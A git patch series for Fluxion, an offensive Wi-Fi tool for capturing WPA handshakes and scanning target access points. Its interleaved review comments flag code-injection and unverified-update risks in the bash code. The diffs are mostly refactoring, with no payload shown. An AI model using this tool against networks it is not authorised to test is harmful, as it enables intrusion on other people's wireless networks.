-FLUXIONPathToHandshakeFileQuery="Enter path to handshake file $CClr(Example: /.../dump-01.cap)" +FLUXIONPathToHandshakeFileQuery="Enter path to handshake file $CClr(Example: /path/to/file.cap)" +FLUXIONPathToHandshakeFileReturnTip="To go back, leave the hash path blank." FLUXIONAbsolutePathInfo="Absolute path" +FLUXIONEmptyOrNonExistentHashError="${CRed}Error$CClr, path points to non-existing or empty hash file." # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerChannelQuery="Select a channel to monitor" FLUXIONScannerChannelOptionAll="All channels" 
@@ -52,6 +54,8 @@ FLUXIONHashSourcePathOption="Path to capture file" FLUXIONHashSourceRescanOption="Handshake directory (rescan)" FLUXIONFoundHashNotice="A hash for the target AP was found." FLUXIONUseFoundHashQuery="Do you want to use this file?" +FLUXIONUseFoundHashOption="Use hash" +FLUXIONSpecifyHashPathOption="Specify hash path" FLUXIONHashVerificationMethodQuery="Select a method of verification for the hash" FLUXIONHashVerificationMethodPyritOption="pyrit verification (${CGrn}recommended$CClr)" FLUXIONHashVerificationMethodAircrackOption="aircrack-ng verification (${CYel}unreliable$CClr)" From 98f3d2b7eaf7b331bb3071452440efd207ff26dc Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Mon, 8 Jan 2018 23:50:10 -0600 Subject: [PATCH 05/45] Fixed allocated interface inconsistency bug. The bug caused the interface allocation subroutine to generate an error when attemping to allocate an interface that had already been allocated rather than gracefully returning, signifying the interface already exists in the allocation table. The interface selector subroutine wasn't masking already allocated interfaces, causing an issue when attemping to reallocate in series (back-to-back). --- fluxion | 56 +++++++++++++++++++++++++++++++++++--------------------- 1 file changed, 35 insertions(+), 21 deletions(-) diff --git a/fluxion b/fluxion index c426ca6..4dc8892 100755 --- a/fluxion +++ b/fluxion 
@@ -623,17 +623,25 @@ function fluxion_deallocate_interface() { # Release interfaces unset FluxionInterfaces[$newIdentifier] } +# Parameters: +# ------------------------------------------------------------ # +# Return 1: No interface identifier was passed. +# Return 2: Interface identifier given points to no interface. +# Return 3: Unable to determine interface's driver. +# Return 4: Fluxion failed to reidentify interface. +# Return 5: Interface allocation failed (identifier missing). function fluxion_allocate_interface() { # Reserve interfaces - if [ ! "$1" ] || ! interface_is_real $1; then return 1; fi + if [ ! "$1" ]; then return 1; fi local -r identifier=$1 - # If the interface is already in allocation table, return it. + # If the interface is already in allocation table, we're done. if [ "${FluxionInterfaces[$identifier]+x}" ]; then - FluxionInterface=${FluxionInterfaces[$identifier]} return 0 fi + if ! interface_is_real $identifier; then return 2; fi + echo -e "$FLUXIONVLine $FLUXIONAllocatingInterfaceNotice" if interface_is_wireless $identifier; then @@ -648,7 +656,7 @@ function fluxion_allocate_interface() { # Reserve interfaces if ! interface_driver "$identifier"; then echo -e "$FLUXIONVLine$CRed $FLUXIONUnknownWIDriverError" sleep 3 - return 2 + return 3 fi # Notice: This local is function-scoped, not block-scoped. @@ -706,7 +714,7 @@ function fluxion_allocate_interface() { # Reserve interfaces fi if [ $? -ne 0 ] # If reidentifying failed, abort immediately. - then return 3 + then return 4 fi fi @@ -740,7 +748,7 @@ function fluxion_allocate_interface() { # Reserve interfaces if [ ! "$newIdentifier" -o "$newIdentifier" = "$oldIdentifier" ]; then echo -e "$FLUXIONVLine $FLUXIONInterfaceAllocationFailedError" sleep 3 - return 4 + return 5 fi # Register identifiers to allocation hash table. 
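Review bot: With the existence check moved below the table lookup, `interface_is_real $identifier` is the first place the caller-supplied name is handed to a helper, and it is unquoted, as is `interface_is_wireless $identifier` a few lines later; `"$identifier"` avoids splitting or globbing on an unexpected name. The new header leaves `Parameters:` empty, and a line such as `# $1: identifier of the interface to allocate` would complete it. The early return no longer sets `FluxionInterface`, so any caller that read it after a repeated allocation has to look the name up in `FluxionInterfaces` instead; no such caller is visible in this hunk, so this is only something to verify.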
@@ -770,13 +778,19 @@ function fluxion_get_interface() { local interfacesAvailableState=() # Gather information from all available interfaces. - local interfaceCandidate - for interfaceCandidate in "${interfacesAvailable[@]}"; do + local -r interfacesAvailableCount=${#interfacesAvailable[@]} + + local i + for (( i = 0; i < interfacesAvailableCount; i++ )); do + local interfaceCandidate=${interfacesAvailable[i]} + interface_chipset "$interfaceCandidate" interfacesAvailableInfo+=("$InterfaceChipset") # If it has already been allocated, we can use it at will. - if [ ${FluxionInterfaces["$interfaceCandidate"]} ]; then + local interfaceCandidateAlt=${FluxionInterfaces["$interfaceCandidate"]} + if [ "$interfaceCandidateAlt" ]; then + interfacesAvailable[$i]=$interfaceCandidateAlt interfacesAvailableColor+=("$CGrn") interfacesAvailableState+=("[*]") else @@ -1337,19 +1351,22 @@ while [ "$1" != "--" ]; do -t|--target) echo "Not yet implemented!"; sleep 3; fluxion_shutdown;; --test) while true; do - if ! fluxion_get_interface subtest1; then - echo Failed to get interface with code $? + fluxion_get_interface subtest1 + result=$? + if [ $result -ne 0 ]; then + echo Failed to get interface with code $result exit fi - if ! fluxion_allocate_interface "$FluxionInterfaceSelected"; then - echo Failed to allocate "$FluxionInterfaceSelected" with code $? + fluxion_allocate_interface "$FluxionInterfaceSelected" + result=$? + if [ $result -ne 0 ]; then + echo Failed to allocate "$FluxionInterfaceSelected" with code $result exit - else - interfaceA=${FluxionInterfaces["$FluxionInterfaceSelected"]} - - echo "Allocated $FluxionInterfaceSelected -> $interfaceA" fi + interfaceA=${FluxionInterfaces["$FluxionInterfaceSelected"]} + + echo "Allocated $FluxionInterfaceSelected -> $interfaceA" fluxion_get_target $interfaceA result=$? 
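Review bot: `local -r interfacesAvailableCount=${#interfacesAvailable[@]}` sits inside the `while true` loop that the previous patch on this page added to `fluxion_get_interface`, so after the Repeat option the second pass tries to reassign a readonly local; bash reports a `readonly variable` error and keeps the old count. The interface list can change between passes, which would leave the `for` loop running with a stale bound. Dropping `-r` is sufficient: `local interfacesAvailableCount=${#interfacesAvailable[@]}`. The loop header itself is outside this hunk.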
@@ -1358,10 +1375,7 @@ while [ "$1" != "--" ]; do exit fi - if ! fluxion_target_show; then - echo Failed to show target with code $? - exit - fi + fluxion_target_show done exit ;; From 792c362d26a9b2cddd03148200109ab6582355a3 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Tue, 9 Jan 2018 01:46:40 -0600 Subject: [PATCH 06/45] Tmux flag, preferences saving, & sequence addition. Added & started implementing the tmux flag, as an alternative to xterm. Added & started implementing redundant-preferences saving (language, ...). Added the language selection screen to fluxion's main sequence. Fixed minor bugs. --- fluxion | 78 ++++++++++++++++++++++++++++++++++++++------------------- 1 file changed, 52 insertions(+), 26 deletions(-) diff --git a/fluxion b/fluxion index 4dc8892..fa735df 100755 --- a/fluxion +++ b/fluxion @@ -33,6 +33,7 @@ if [ $EUID -ne 0 ] # Super User Check fi # ===================== < XTerm Checks > ===================== # +# TODO: Run the checks below only if we're not using tmux. if [ ! "${DISPLAY:-}" ] # Assure display is available. then echo -e "Aborted, X (graphical) session unavailable."; exit 2 fi @@ -76,7 +77,7 @@ source lib/HashUtils.sh # ============================================================ # # =================== < Parse Parameters > =================== # # ============================================================ # -if ! FLUXIONCLIArguments=$(getopt --options="vdkrntl:a:" --longoptions="debug,version,killer,reloader,airmon-ng,target,test,language:,attack:" --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@") +if ! FLUXIONCLIArguments=$(getopt --options="vdkrnmtl:a:" --longoptions="debug,version,killer,reloader,airmon-ng,multiplexer,target,test,language:,attack:" --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@") then echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 fi 
@@ -99,6 +100,7 @@ while [ "$1" != "--" ]; do -k|--killer) declare -r FLUXIONWIKillProcesses=1;; -r|--reloader) declare -r FLUXIONWIReloadDriver=1;; -n|--airmon-ng) declare -r FLUXIONAirmonNG=1;; + -m|--multiplexer) declare -r FLUXIONTMux=1;; -l|--language) FLUXIONLanguage=$2; shift;; -a|--attack) FLUXIONAttack=$2; shift;; esac @@ -110,9 +112,13 @@ shift # Remove "--" to prepare for attacks to read parameters. # =================== < User Preferences > =================== # # Load user-defined preferences if there's an executable script. +# If no script exists, prepare one for the user to store config. # WARNING: Preferences file must assure no redeclared constants. if [ -x "$FLUXIONPreferencesFile" ] then source "$FLUXIONPreferencesFile" +else + echo '#!/bin/bash' > "$FLUXIONPreferencesFile" + chmod u+x "$FLUXIONPreferencesFile" fi # ================ < Configurable Constants > ================ # @@ -450,10 +456,11 @@ function fluxion_undo() { local __fluxion_undo__i for (( __fluxion_undo__i=${#__fluxion_undo__history[@]}; \ __fluxion_undo__i > 0; __fluxion_undo__i-- )); do - local -r __fluxion_undo__instruction=${__fluxion_undo__history[__fluxion_undo__i-1]} - local -r __fluxion_undo__command=${__fluxion_undo__instruction%%_*} - local -r __fluxion_undo__identifier=${__fluxion_undo__instruction#*_} - if eval ${__fluxion_undo__namespace}_${FLUXIONUndoable["$__fluxion_undo__command"]}_$__fluxion_undo__identifier; then + local __fluxion_undo__instruction=${__fluxion_undo__history[__fluxion_undo__i-1]} + local __fluxion_undo__command=${__fluxion_undo__instruction%%_*} + local __fluxion_undo__identifier=${__fluxion_undo__instruction#*_} + + if ! eval ${__fluxion_undo__namespace}_${FLUXIONUndoable["$__fluxion_undo__command"]}_$__fluxion_undo__identifier; then eval FXDLog_$__fluxion_undo__namespace=\("${__fluxion_undo__history[@]::$__fluxion_undo__i}"\) return 0 fi 
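Review bot: The preferences file is now created with `echo '#!/bin/bash' > "$FLUXIONPreferencesFile"` under whatever umask is active, and it is `source`d on every later start of a script that insists on running as root. Nothing checks who owns the file, or whether it is a symlink, before it is sourced, so if the install directory is writable by another account, that account's edits would execute with root privileges. A guard in front of the `source`, for example `[ -O "$FLUXIONPreferencesFile" ] && [ ! -L "$FLUXIONPreferencesFile" ]`, and `chmod u+x,go-w` on creation would narrow this. Whether the install directory is in fact shared cannot be told from the hunk.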
@@ -468,7 +475,8 @@ function fluxion_done() { local -r __fluxion_done__namespace=$1 eval "FluxionDone=\${FXDLog_$__fluxion_done__namespace[-1]}" - [ ! $FluxionDone ] && return 1 + + if [ ! "$FluxionDone" ]; then return 1; fi } function fluxion_done_reset() { @@ -501,6 +509,7 @@ function fluxion_do_sequence() { __fluxion_do_sequence__index["${__fluxion_do_sequence__sequence[i-1]}"]=$i done + # Start sequence with the first instruction available. local __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence[0]} while [ "$__fluxion_do_sequence__instruction" ]; do if ! fluxion_do $__fluxion_do_sequence__namespace $__fluxion_do_sequence__instruction; then @@ -509,7 +518,9 @@ function fluxion_do_sequence() { fi fi - if ! fluxion_done; then return -3; fi + if ! fluxion_done $__fluxion_do_sequence__namespace; then + return -3; + fi local __fluxion_do_sequence__instructionIndex=${__fluxion_do_sequence__index["$FluxionDone"]} 
@@ -544,26 +555,26 @@ function fluxion_header() { # ======================= < Language > ======================= # function fluxion_unset_language() { FLUXIONLanguage="" + + if [ "$FLUXIONPreferencesFile" ]; then + sed -i.backup "/FLUXIONLanguage=.\+/ d" "$FLUXIONPreferencesFile" + fi } function fluxion_set_language() { if [ ! "$FLUXIONLanguage" ]; then - if [ "$FLUXIONAuto" ]; then - FLUXIONLanguage="en" - else - # Get all languages available. - local languageCodes - readarray -t languageCodes < <(ls -1 language | sed -E 's/\.sh//') + # Get all languages available. + local languageCodes + readarray -t languageCodes < <(ls -1 language | sed -E 's/\.sh//') - local languages - readarray -t languages < <(head -n 3 language/*.sh | grep -E "^# native: " | sed -E 's/# \w+: //') + local languages + readarray -t languages < <(head -n 3 language/*.sh | grep -E "^# native: " | sed -E 's/# \w+: //') - io_query_format_fields "$FLUXIONVLine Select your language" "\t$CRed[$CSYel%d$CClr$CRed]$CClr %s / %s\n" languageCodes[@] languages[@] + io_query_format_fields "$FLUXIONVLine Select your language" "\t$CRed[$CSYel%d$CClr$CRed]$CClr %s / %s\n" languageCodes[@] languages[@] - FLUXIONLanguage=${IOQueryFormatFields[0]} + FLUXIONLanguage=${IOQueryFormatFields[0]} - echo # Do not remove. - fi + echo # Do not remove. fi # Check if all language files are present for the selected language. @@ -581,6 +592,16 @@ function fluxion_set_language() { fi source "$FLUXIONPath/language/$FLUXIONLanguage.sh" + + if [ "$FLUXIONPreferencesFile" ]; then + if more $FLUXIONPreferencesFile | \ + grep -q "FLUXIONLanguage=.\+" &> /dev/null; then + sed -r "s/FLUXIONLanguage=.+/FLUXIONLanguage=$FLUXIONLanguage/g" \ + -i.backup "$FLUXIONPreferencesFile" + else + echo "FLUXIONLanguage=$FLUXIONLanguage" >> "$FLUXIONPreferencesFile" + fi + fi } # ====================== < Interfaces > ====================== # 
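Review bot: `fluxion_set_language` writes the `-l/--language` value into the preferences file, both with `echo "FLUXIONLanguage=$FLUXIONLanguage" >>` and inside a `sed` replacement, and that file is `source`d on the next start, so a value containing spaces, `;`, `/` or `&` either corrupts the `sed` expression or is later read as shell code. Validating the value before persisting it, e.g. `[[ $FLUXIONLanguage =~ ^[A-Za-z_-]+$ ]] || return 1` (adjusted to the codes actually present under `language/`), and writing it with `printf 'FLUXIONLanguage=%q\n' "$FLUXIONLanguage"` closes that. `more $FLUXIONPreferencesFile | grep -q ... &> /dev/null` can be `grep -q "FLUXIONLanguage=.\+" "$FLUXIONPreferencesFile"`, which also quotes the path and drops the pager.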
@@ -1260,16 +1281,16 @@ function fluxion_set_attack() { fi done - attacks+=("$FLUXIONGeneralExitOption") - identifiers+=("$FLUXIONGeneralExitOption") + attacks+=("$FLUXIONGeneralBackOption") + identifiers+=("$FLUXIONGeneralBackOption") descriptions+=("") io_query_format_fields "" "\t$CRed[$CSYel%d$CClr$CRed]$CClr%0.0s $CCyn%b$CClr %b\n" attacks[@] identifiers[@] descriptions[@] echo - if [ "${IOQueryFormatFields[1]}" = "$FLUXIONGeneralExitOption" ]; then - fluxion_shutdown; exit + if [ "${IOQueryFormatFields[1]}" = "$FLUXIONGeneralBackOption" ]; then + return -1 fi FluxionAttack=${IOQueryFormatFields[0]} @@ -1335,6 +1356,7 @@ function subtest1() { local interface interface_list_all for interface in "${InterfaceListAll[@]}"; do + if [ "$interface" = "lo" ]; then continue; fi echo "$interface" done } @@ -1393,10 +1415,14 @@ function fluxion_main() { fluxion_startup fluxion_set_resolution - fluxion_set_language - - local -r sequence=("set_attack" "prep_attack" "run_attack") + local -r sequence=( \ + "set_language" \ + "set_attack" \ + "prep_attack" \ + "run_attack" \ + ) + while true # Fluxion's runtime-loop. do fluxion_do_sequence fluxion sequence[@] done From f16917d04f61baee8945c407fdb44de548e64262 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Tue, 9 Jan 2018 13:36:29 -0600 Subject: [PATCH 07/45] Shortened some statements to follow style guides. --- fluxion | 181 +++++++++++++++++++++++++++++++++++++++----------------- 1 file changed, 128 insertions(+), 53 deletions(-) diff --git a/fluxion b/fluxion index fa735df..22862a1 100755 --- a/fluxion +++ b/fluxion 
@@ -77,8 +77,12 @@ source lib/HashUtils.sh # ============================================================ # # =================== < Parse Parameters > =================== # # ============================================================ # -if ! FLUXIONCLIArguments=$(getopt --options="vdkrnmtl:a:" --longoptions="debug,version,killer,reloader,airmon-ng,multiplexer,target,test,language:,attack:" --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@") - then echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 +if ! FLUXIONCLIArguments=$( + getopt --options="vdkrnmtl:a:" \ + --longoptions="debug,version,killer,reloader,airmon-ng,multiplexer,target,test,language:,attack:" \ + --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@" + ); then + echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 fi declare -r FLUXIONCLIArguments=$FLUXIONCLIArguments 
@@ -190,20 +194,26 @@ source "$FLUXIONPath/language/en.sh" function fluxion_startup() { if [ "$FLUXIONDebug" ]; then return 1; fi - FLUXIONBanner=() + local banner=() - format_center_literals " ⌠▓▒▓▒ ⌠▓╗ ⌠█┐ ┌█ ┌▓\ /▓┐ ⌠▓╖ ⌠◙▒▓▒◙ ⌠█\ ☒┐" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ║▒_ │▒║ │▒║ ║▒ \▒\/▒/ │☢╫ │▒┌╤┐▒ ║▓▒\ ▓║" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ≡◙◙ ║◙║ ║◙║ ║◙ ◙◙ ║¤▒ ║▓║☯║▓ ♜◙\✪\◙♜" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ║▒ │▒║__ │▒└_┘▒ /▒/\▒\ │☢╫ │▒└╧┘▒ ║█ \▒█║" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ⌡▓ ⌡◘▒▓▒ ⌡◘▒▓▒◘ └▓/ \▓┘ ⌡▓╝ ⌡◙▒▓▒◙ ⌡▓ \▓┘" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals "¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯ ¯¯¯ ¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯" - FLUXIONBanner+=("$FormatCenterLiterals") + format_center_literals \ + " ⌠▓▒▓▒ ⌠▓╗ ⌠█┐ ┌█ ┌▓\ /▓┐ ⌠▓╖ ⌠◙▒▓▒◙ ⌠█\ ☒┐" + banner+=("$FormatCenterLiterals") + format_center_literals \ + " ║▒_ │▒║ │▒║ ║▒ \▒\/▒/ │☢╫ │▒┌╤┐▒ ║▓▒\ ▓║" + banner+=("$FormatCenterLiterals") + format_center_literals \ + " ≡◙◙ ║◙║ ║◙║ ║◙ ◙◙ ║¤▒ ║▓║☯║▓ ♜◙\✪\◙♜" + banner+=("$FormatCenterLiterals") + format_center_literals \ + " ║▒ │▒║__ │▒└_┘▒ /▒/\▒\ │☢╫ │▒└╧┘▒ ║█ \▒█║" + banner+=("$FormatCenterLiterals") + format_center_literals \ + " ⌡▓ ⌡◘▒▓▒ ⌡◘▒▓▒◘ └▓/ \▓┘ ⌡▓╝ ⌡◙▒▓▒◙ ⌡▓ \▓┘" + banner+=("$FormatCenterLiterals") + format_center_literals \ + "¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯ ¯¯¯ ¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯" + banner+=("$FormatCenterLiterals") clear 
@@ -212,32 +222,49 @@ function fluxion_startup() { else echo -e "$CRed" fi - for line in "${FLUXIONBanner[@]}" + for line in "${banner[@]}" do echo "$line"; sleep 0.05 done echo # Do not remove. sleep 0.1 - format_center_literals "${CGrn}Site: ${CRed}https://github.com/FluxionNetwork/fluxion$CClr" + local -r fluxionRepository="https://github.com/FluxionNetwork/fluxion" + format_center_literals "${CGrn}Site: ${CRed}$fluxionRepository$CClr" echo -e "$FormatCenterLiterals" sleep 0.1 - format_center_literals "${CSRed}FLUXION $FLUXIONVersion$CClr (rev. $CSBlu$FLUXIONRevision$CClr)$CYel by$CWht ghost" + local -r versionInfo="${CSRed}FLUXION $FLUXIONVersion$CClr" + local -r revisionInfo="(rev. $CSBlu$FLUXIONRevision$CClr)" + local -r credits="${CYel}by$CWht FluxionNetwork" + format_center_literals "$versionInfo $revisionInfo $credits" echo -e "$FormatCenterLiterals" sleep 0.1 - if installer_utils_check_update "https://raw.githubusercontent.com/FluxionNetwork/fluxion/master/fluxion.sh" "FLUXIONVersion=" "FLUXIONRevision=" $FLUXIONVersion $FLUXIONRevision - then installer_utils_run_update "https://github.com/FluxionNetwork/fluxion/archive/master.zip" "FLUXION-V$FLUXIONVersion.$FLUXIONRevision" "$(dirname "$FLUXIONPath")" + local -r fluxionDomain="raw.githubusercontent.com" + local -r fluxionPath="FluxionNetwork/fluxion/master/fluxion.sh" + local -r updateDomain="github.com" + local -r updatePath="FluxionNetwork/fluxion/archive/master.zip" + if installer_utils_check_update "https://$fluxionDomain/$fluxionPath" \ + "FLUXIONVersion=" "FLUXIONRevision=" \ + $FLUXIONVersion $FLUXIONRevision; then + installer_utils_run_update "https://$updateDomain/$updatePath" \ + "FLUXION-V$FLUXIONVersion.$FLUXIONRevision" \ + "$(dirname "$FLUXIONPath")" fi echo # Do not remove. 
- FLUXIONCLIToolsRequired=("aircrack-ng" "python2:python2.7|python2" "bc" "awk:awk|gawk|mawk" "curl" "dhcpd:isc-dhcp-server|dhcp" "7zr:p7zip" "hostapd" "lighttpd" "iwconfig:wireless-tools" "macchanger" "mdk3" "nmap" "openssl" "php-cgi" "pyrit" "xterm" "rfkill" "unzip" "route:net-tools" "fuser:psmisc" "killall:psmisc") - FLUXIONCLIToolsMissing=() + local requiredCLITools=( + "aircrack-ng" "python2:python2.7|python2" "bc" "awk:awk|gawk|mawk" + "curl" "dhcpd:isc-dhcp-server|dhcp" "7zr:p7zip" "hostapd" "lighttpd" + "iwconfig:wireless-tools" "macchanger" "mdk3" "nmap" "openssl" + "php-cgi" "pyrit" "xterm" "rfkill" "unzip" "route:net-tools" + "fuser:psmisc" "killall:psmisc" + ) - while ! installer_utils_check_dependencies FLUXIONCLIToolsRequired[@] - do installer_utils_run_dependencies InstallerUtilsCheckDependencies[@] + while ! installer_utils_check_dependencies requiredCLITools[@]; do + installer_utils_run_dependencies InstallerUtilsCheckDependencies[@] done echo -e "\n\n" # This echo is for spacing 
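Review bot: The update check in fluxion_startup still reads the version from `FluxionNetwork/fluxion/master/fluxion.sh`, while this series moves development to a script named `fluxion`, so the comparison is presumably made against the old script's version lines. More important, `installer_utils_run_update` is handed `archive/master.zip` on every start of a root process, and nothing visible here pins a tag or verifies a checksum or signature; its implementation is outside this hunk, so confirm that it verifies what it unpacks, or make the update an explicit opt-in. `$FLUXIONVersion $FLUXIONRevision` should be quoted, and `line` in the banner loop should be declared `local`. fluxion_startup begins before this hunk and continues after it.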
@@ -253,20 +280,22 @@ function fluxion_shutdown() { echo -e "$CWht[$CRed-$CWht]$CRed $FLUXIONCleanupAndClosingNotice$CClr" - # List currently running processes which we might have to kill before exiting. + # Get running processes we might have to kill before exiting. local processes readarray processes < <(ps -A) # Currently, fluxion is only responsible for killing airodump-ng, since # fluxion explicitly uses it to scan for candidate target access points. # NOTICE: Processes started by subscripts, such as an attack script, - # MUST BE TERMINATED BY THAT SAME SCRIPT in the subscript's abort handler. + # MUST BE TERMINATED BY THAT SCRIPT in the subscript's abort handler. local -r targets=("airodump-ng") local targetID # Program identifier/title for targetID in "${targets[@]}"; do # Get PIDs of all programs matching targetPID - local targetPID=$(echo "${processes[@]}" | awk '$4~/'"$targetID"'/{print $1}') + local targetPID=$( + echo "${processes[@]}" | awk '$4~/'"$targetID"'/{print $1}' + ) if [ ! "$targetPID" ]; then continue; fi echo -e "$CWht[$CRed-$CWht] `io_dynamic_output $FLUXIONKillingProcessNotice`" kill -s SIGKILL $targetPID &> $FLUXIONOutputDevice @@ -274,7 +303,9 @@ function fluxion_shutdown() { # Assure changes are reverted if installer was activated. if [ "$PackageManagerCLT" ]; then - echo -e "$CWht[$CRed-$CWht] "$(io_dynamic_output "$FLUXIONRestoringPackageManagerNotice")"$CClr" + echo -e "$CWht[$CRed-$CWht] "$( + io_dynamic_output "$FLUXIONRestoringPackageManagerNotice" + )"$CClr" unprep_package_manager fi 
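Review bot: The PID lookup in fluxion_shutdown matches `$4~/airodump-ng/` as a regular expression over a `ps -A` snapshot, so any process whose name merely contains that string is selected and then sent SIGKILL by a root script. An exact-name lookup is narrower and drops the awk step: `local targetPID; targetPID=$(pgrep -x "$targetID")`, which also stops `local` from masking the command's exit status. Sending the default TERM first and KILL only if the process survives gives it a chance to clean up. The function starts before this hunk and ends after the next one.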
@@ -459,7 +490,7 @@ function fluxion_undo() { local __fluxion_undo__instruction=${__fluxion_undo__history[__fluxion_undo__i-1]} local __fluxion_undo__command=${__fluxion_undo__instruction%%_*} local __fluxion_undo__identifier=${__fluxion_undo__instruction#*_} - + if ! eval ${__fluxion_undo__namespace}_${FLUXIONUndoable["$__fluxion_undo__command"]}_$__fluxion_undo__identifier; then eval FXDLog_$__fluxion_undo__namespace=\("${__fluxion_undo__history[@]::$__fluxion_undo__i}"\) return 0 @@ -568,9 +599,15 @@ function fluxion_set_language() { readarray -t languageCodes < <(ls -1 language | sed -E 's/\.sh//') local languages - readarray -t languages < <(head -n 3 language/*.sh | grep -E "^# native: " | sed -E 's/# \w+: //') + readarray -t languages < <( + head -n 3 language/*.sh | + grep -E "^# native: " | + sed -E 's/# \w+: //' + ) - io_query_format_fields "$FLUXIONVLine Select your language" "\t$CRed[$CSYel%d$CClr$CRed]$CClr %s / %s\n" languageCodes[@] languages[@] + io_query_format_fields "$FLUXIONVLine Select your language" \ + "\t$CRed[$CSYel%d$CClr$CRed]$CClr %s / %s\n" \ + languageCodes[@] languages[@] FLUXIONLanguage=${IOQueryFormatFields[0]} @@ -687,7 +724,9 @@ function fluxion_allocate_interface() { # Reserve interfaces rmmod -f $driver &> $FLUXIONOutputDevice # Wait while interface becomes unavailable. - echo -e "$FLUXIONVLine `io_dynamic_output $FLUXIONUnloadingWIDriverNotice`" + echo -e "$FLUXIONVLine "$( + io_dynamic_output $FLUXIONUnloadingWIDriverNotice + ) while interface_physical "$identifier" do sleep 1 done @@ -713,7 +752,9 @@ function fluxion_allocate_interface() { # Reserve interfaces modprobe "$driver" &> $FLUXIONOutputDevice # Wait while interface becomes available. - echo -e "$FLUXIONVLine `io_dynamic_output $FLUXIONLoadingWIDriverNotice`" + echo -e "$FLUXIONVLine "$( + io_dynamic_output $FLUXIONLoadingWIDriverNotice + ) while ! interface_physical "$identifier" do sleep 1 done 
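Review bot: In hunk -687,7, moving the substitution out of the string in `echo -e "$FLUXIONVLine "$( io_dynamic_output $FLUXIONUnloadingWIDriverNotice )` leaves it unquoted, whereas the old backticks sat inside the double quotes. The notice now undergoes word splitting and pathname expansion, so runs of spaces collapse and a `*` in a translated message would expand to file names. Keep it inside the quotes: `echo -e "$FLUXIONVLine $(io_dynamic_output $FLUXIONUnloadingWIDriverNotice)"`. The same applies to the FLUXIONLoadingWIDriverNotice hunk that follows and to the package-manager notice in fluxion_shutdown. fluxion_allocate_interface starts and ends outside these hunks.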
@@ -844,7 +885,9 @@ function fluxion_get_interface() { "$CClr" \ ) - format_apply_autosize "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" + format_apply_autosize \ + "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" + io_query_format_fields \ "$FLUXIONVLine $FLUXIONInterfaceQuery" "$FormatApplyAutosize" \ interfacesAvailableColor[@] interfacesAvailable[@] \ @@ -888,7 +931,9 @@ function fluxion_target_get_candidates() { #fi # Begin scanner and output all results to "dump-01.csv." - if ! xterm -title "$FLUXIONScannerHeader" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e "airodump-ng -Mat WPA "${2:+"--channel $2"}" "${3:+"--band $3"}" -w \"$FLUXIONWorkspacePath/dump\" $1" 2> $FLUXIONOutputDevice; then + if ! xterm -title "$FLUXIONScannerHeader" $TOPLEFTBIG \ + -bg "#000000" -fg "#FFFFFF" -e \ + "airodump-ng -Mat WPA "${2:+"--channel $2"}" "${3:+"--band $3"}" -w \"$FLUXIONWorkspacePath/dump\" $1" 2> $FLUXIONOutputDevice; then echo -e "$FLUXIONVLine$CRed $FLUXIONGeneralXTermFailureError" sleep 5 return 2 
@@ -906,10 +951,23 @@ function fluxion_target_get_candidates() { echo -e "$FLUXIONVLine $FLUXIONPreparingScannerResultsNotice" # WARNING: The code below may break with different version of airmon-ng. # The times matching operator "{n}" isn't supported by mawk (alias awk). - # readarray FLUXIONTargetCandidates < <(gawk -F, 'NF==15 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) - # readarray FLUXIONTargetCandidatesClients < <(gawk -F, 'NF==7 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) - readarray FluxionTargetCandidates < <(awk -F, 'NF==15 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") - readarray FluxionTargetCandidatesClients < <(awk -F, 'NF==7 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") + # readarray FLUXIONTargetCandidates < <( + # gawk -F, 'NF==15 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' + # $FLUXIONWorkspacePath/dump-01.csv + # ) + # readarray FLUXIONTargetCandidatesClients < <( + # gawk -F, 'NF==7 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' + # $FLUXIONWorkspacePath/dump-01.csv + # ) + local -r matchMAC="([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]" + readarray FluxionTargetCandidates < <( + awk -F, "NF==15 && length(\$1)==17 && \$1~/$matchMAC/ {print \$0}" + "$FLUXIONWorkspacePath/dump-01.csv" + ) + readarray FluxionTargetCandidatesClients < <( + awk -F, "NF==7 && length(\$1)==17 && \$1~/$matchMAC/ {print \$0}" + "$FLUXIONWorkspacePath/dump-01.csv" + ) # Cleanup the workspace to prevent potential bugs/conflicts. sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" 
